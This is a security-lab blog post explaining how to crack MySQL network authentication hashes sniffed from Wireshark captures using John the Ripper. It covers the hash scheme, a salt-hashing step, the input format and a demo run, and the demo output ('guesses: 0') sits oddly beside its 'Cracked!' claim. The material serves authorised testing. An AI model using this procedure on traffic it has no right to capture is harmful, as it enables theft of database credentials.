JohnTheRipper magnum-jumbo now has support for MySQL authentication hashes. These are different from the normal MySQL password hashes you’d find in the information_schema database, and they’re only used as part of the authentication protocol.

If you go into Wireshark and look at some MySQL traffic for versions >=4.1, you’ll see a “Server Greeting” packet which contains a random salt value. Wireshark nicely dissects this for you. Look for the “LoginRequest” packet, and find the password field – this is a hash based on the real password and the salt.

The hash’s construction is as follows:

SHA1( password ) XOR SHA1( salt <concat> SHA1( SHA1( password ) ) )

The scheme itself isn’t particularly important – what’s important is the fact that it’s relatively efficient to compute, and can therefore be efficiently cracked. JTR can now crack these hashes, but there’s a step missing from the documentation because it assumes that you’re pulling the data from a Cain & Abel sniffer rather than directly from Wireshark. What it doesn’t tell you is that you must manually hash the 20-byte salt value with SHA-1, then use that in your passwords file in the following format:

username:$mysqlna$hashed_salt*password_hash

JTR can then automatically recognise the hash as a MySQL native authentication hash. Cain’s sniffer automatically hashes the salt value (it calls this the challenge), which is why the step is missing from the documentation.

As a quick demo:

Username = root
Salt = D|ecBa?Vuh-B
SHA-1(Salt) = b19b45d3cca9af80ccff343a78a02db6bd39a4c7
Password = a6f6a3a746caa99690eecba786629cfe43e87658

This becomes…

root:$mysqlna
$b19b45d3cca9af80ccff343a78a02db6bd39a4c7*a6f6a3a746caa99690eecba786629cfe43e87658
root@vm# ./john --wordlist=password.lst ~/mysql-na.pwd
Loaded 1 password hash (MySQL Network Authentication SHA1 [32/64])
guesses: 0  time: 0:00:00:00 DONE (Thu May  9 14:14:50 2013)  c/s:
52650  trying: bacon

Cracked!

Written by: Graham Sutherland of Portcullis.

References:

* MySQL documentation for password hash scheme:
http://dev.mysql.com/doc/internals/en/authentication-method.html#secure-password-authentication
(accessed 22nd of May, 2013)

* JTR magnum-jumbo project page:
https://github.com/magnumripper/JohnTheRipper/ – (accessed 22nd of May, 2013)

Any questions/feedback?

If you have any further question/feedback regarding the Cracking MySQL network authentication hashes with John The Ripper article, please do get in touch! We would like to hear your thoughts.You may contact us at: labs@portcullis-security.com.

Categories